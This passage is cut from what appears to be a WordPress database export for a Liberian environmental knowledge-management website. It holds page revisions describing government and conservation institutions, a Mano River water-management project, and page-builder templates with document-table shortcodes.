value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-20 16:12:31','2019-11-20 16:12:31','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2617,1,'2019-11-20 22:47:36','2019-11-20 22:47:36','The GEF-funded “Mano River Ecosystem Conservation and International Water Resources Management (IWRM) Project” is being implemented by the International Union for Conservation of Nature (IUCN). It targets the conservation and sustainable use of the transboundary water basins and their biodiversity resources within the Mano River Union member states. These resources are of highest importance for the sub-region, seriously affected by socio-political problems with displaced and suffering populations, and demand support under these very difficult contexts. The project seeks to promote holistic approaches to integrated ecosystem management and to design participatory and\r\ncommunity–based strategies, which will lead to in-situ conservation and sustainable use of soil, water and biota in the river basins and on their watersheds.\r\n\r\nThe project is being implemented in the Upper Guinea forest covering Sierra Leone, Guinea, Liberia and Cote d’Ivoire with the objective of strengthening the management of transboundary natural resources for sustained ecological benefits and improved livelihoods for the forest adjacent communities.','The Mano IWRM Project','','publish','closed','closed','','the-mano-iwrm-project','','','2019-11-20 22:47:36','2019-11-20 22:47:36','',0,'https://ekmsliberia.info/?post_type=project_resource&#038;p=2617',3,'project_resource','',0),(2618,1,'2019-11-20 22:47:04','2019-11-20 22:47:04','','featured_iwrm','Photo Credit: FDA','inherit','open','closed','','featured_iwrm','','','2019-11-20 22:47:31','2019-11-20 22:47:31','',2617,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_iwrm.jpg',0,'attachment','image/jpeg',0),(2619,1,'2019-11-20 22:47:36','2019-11-20 22:47:36','The GEF-funded “Mano River Ecosystem Conservation and International Water Resources Management (IWRM) Project” is being implemented by the International Union for Conservation of Nature (IUCN). It targets the conservation and sustainable use of the transboundary water basins and their biodiversity resources within the Mano River Union member states. These resources are of highest importance for the sub-region, seriously affected by socio-political problems with displaced and suffering populations, and demand support under these very difficult contexts. The project seeks to promote holistic approaches to integrated ecosystem management and to design participatory and\r\ncommunity–based strategies, which will lead to in-situ conservation and sustainable use of soil, water and biota in the river basins and on their watersheds.\r\n\r\nThe project is being implemented in the Upper Guinea forest covering Sierra Leone, Guinea, Liberia and Cote d’Ivoire with the objective of strengthening the management of transboundary natural resources for sustained ecological benefits and improved livelihoods for the forest adjacent communities.','The Mano IWRM Project','','inherit','closed','closed','','2617-revision-v1','','','2019-11-20 22:47:36','2019-11-20 22:47:36','',2617,'https://ekmsliberia.info/2617-revision-v1/',0,'revision','',0),(2620,1,'2019-11-20 23:19:35','2019-11-20 23:19:35','<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and</p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lisgis\" page_length=\"false\"]','Liberia Institute for Statistics and Geo-Information Services','','inherit','closed','closed','','1544-revision-v1','','','2019-11-20 23:19:35','2019-11-20 23:19:35','',1544,'https://ekmsliberia.info/1544-revision-v1/',0,'revision','',0),(2621,1,'2019-11-20 23:20:34','2019-11-20 23:20:34','<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>','Query for featured projects','','publish','closed','closed','','query-for-featured-projects','','','2019-11-20 23:20:34','2019-11-20 23:20:34','',0,'https://ekmsliberia.info/?elementor_library=query-for-featured-projects',0,'elementor_library','',0),(2622,1,'2019-11-20 23:20:34','2019-11-20 23:20:34','','Query for featured projects','','inherit','closed','closed','','2621-revision-v1','','','2019-11-20 23:20:34','2019-11-20 23:20:34','',2621,'https://ekmsliberia.info/2621-revision-v1/',0,'revision','',0),(2623,1,'2019-11-20 23:20:34','2019-11-20 23:20:34','<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>','Query for featured projects','','inherit','closed','closed','','2621-revision-v1','','','2019-11-20 23:20:34','2019-11-20 23:20:34','',2621,'https://ekmsliberia.info/2621-revision-v1/',0,'revision','',0),(2624,1,'2019-11-20 23:21:38','2019-11-20 23:21:38','<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','document database shortcode','','publish','closed','closed','','document-database-shortcode','','','2019-11-20 23:21:38','2019-11-20 23:21:38','',0,'https://ekmsliberia.info/?elementor_library=document-database-shortcode',0,'elementor_library','',0),(2625,1,'2019-11-20 23:21:38','2019-11-20 23:21:38','','document database shortcode','','inherit','closed','closed','','2624-revision-v1','','','2019-11-20 23:21:38','2019-11-20 23:21:38','',2624,'https://ekmsliberia.info/2624-revision-v1/',0,'revision','',0),(2626,1,'2019-11-20 23:21:38','2019-11-20 23:21:38','<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','document database shortcode','','inherit','closed','closed','','2624-revision-v1','','','2019-11-20 23:21:38','2019-11-20 23:21:38','',2624,'https://ekmsliberia.info/2624-revision-v1/',0,'revision','',0),(2627,1,'2019-11-20 23:24:47','2019-11-20 23:24:47','<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.</p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector — stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:wash\" page_length=\"false\"]','Liberia National Water, Sanitation and Hygiene - WASH Commission','','inherit','closed','closed','','2457-revision-v1','','','2019-11-20 23:24:47','2019-11-20 23:24:47','',2457,'https://ekmsliberia.info/2457-revision-v1/',0,'revision','',0),(2628,1,'2019-11-20 23:27:27','2019-11-20 23:27:27','<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.</p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. </p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lla\" page_length=\"false\"]','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-20 23:27:27','2019-11-20 23:27:27','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(2629,1,'2019-11-20 23:29:59','2019-11-20 23:29:59','<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.</p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.</p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.</p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.</p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.</p><p>FFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2019-11-20 23:29:59','2019-11-20 23:29:59','',1614,'https://ekmsliberia.info/1614-revision-v1/',0,'revision','',0),(2630,1,'2019-11-20 23:30:23','2019-11-20 23:30:23','<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.</p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. </p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lla\" page_length=\"false\"]','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-20 23:30:23','2019-11-20 23:30:23','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(2631,1,'2019-11-20 23:33:18','2019-11-20 23:33:18','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.</p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-20 23:33:18','2019-11-20 23:33:18','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2632,1,'2019-11-20 23:35:17','2019-11-20 23:35:17','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.</p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.</p>		\n			<h2>Featured Projects</h2>','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-20 23:35:17','2019-11-20 23:35:17','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2633,1,'2019-11-20 23:35:46','2019-11-20 23:35:46','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.</p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-20 23:35:46','2019-11-20 23:35:46','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2634,1,'2019-11-20 23:36:40','2019-11-20 23:36:40','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.</p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ci\" page_length=\"false\"]','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-20 23:36:40','2019-11-20 23:36:40','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2635,1,'2019-11-20 23:38:37','2019-11-20 23:38:37','<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.</p>		\n			<h2>Featured Projects</h2>','Ministry of Internal Affairs','','inherit','closed','closed','','1610-revision-v1','','','2019-11-20 23:38:37','2019-11-20 23:38:37','',1610,'https://ekmsliberia.info/1610-revision-v1/',0,'revision','',0),(2636,1,'2019-11-20 23:39:00','2019-11-20 23:39:00','<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mia\" page_length=\"false\"]','Ministry of Internal Affairs','','inherit','closed','closed','','1610-revision-v1','','','2019-11-20 23:39:00','2019-11-20 23:39:00','',1610,'https://ekmsliberia.info/1610-revision-v1/',0,'revision','',0),(2637,1,'2019-11-20 23:40:27','2019-11-20 23:40:27','<p>LiMA coming soon!</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2019-11-20 23:40:27','2019-11-20 23:40:27','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(2638,1,'2019-11-20 23:40:48','2019-11-20 23:40:48','<p>LiMA coming soon!</p>		\n			<h2>Featured Projects</h2>		\n										<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\"><img width=\"1024\" height=\"530\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg\" alt=\"Enhancing Resilience of Vulnerable Coastal Areas\" title=\"Enhancing Resilience of Vulnerable Coastal Areas\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-300x155.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme_project-768x398.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Enhancing Resilience of Vulnerable Coastal Areas</a>Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community...<a href=\"https://ekmsliberia.info/project-resource/enhancing-resilience-of-vulnerable-coastal-areas/\">Read More</a>\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2019-11-20 23:40:48','2019-11-20 23:40:48','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(2639,1,'2019-11-20 23:41:51','2019-11-20 23:41:51','<p>LiMA coming soon!</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2019-11-20 23:41:51','2019-11-20 23:41:51','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(2640,1,'2019-11-20 23:42:02','2019-11-20 23:42:02','<p>LiMA coming soon!</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lima\" page_length=\"false\"]','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2019-11-20 23:42:02','2019-11-20 23:42:02','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(2641,1,'2019-11-20 23:45:00','2019-11-20 23:45:00','National Concession information coming soon!		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:concessions\" page_length=\"false\"]','Liberia National Bureau of Concessions','','inherit','closed','closed','','1604-revision-v1','','','2019-11-20 23:45:00','2019-11-20 23:45:00','',1604,'https://ekmsliberia.info/1604-revision-v1/',0,'revision','',0),(2643,1,'2019-11-20 23:49:20','2019-11-20 23:49:20','<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.</p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mot\" page_length=\"false\"]','Ministry of Transport','','inherit','closed','closed','','1598-revision-v1','','','2019-11-20 23:49:20','2019-11-20 23:49:20','',1598,'https://ekmsliberia.info/1598-revision-v1/',0,'revision','',0),(2644,1,'2019-11-20 23:50:48','2019-11-20 23:50:48','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-20 23:50:48','2019-11-20 23:50:48','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2645,1,'2019-11-20 23:53:14','2019-11-20 23:53:14','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		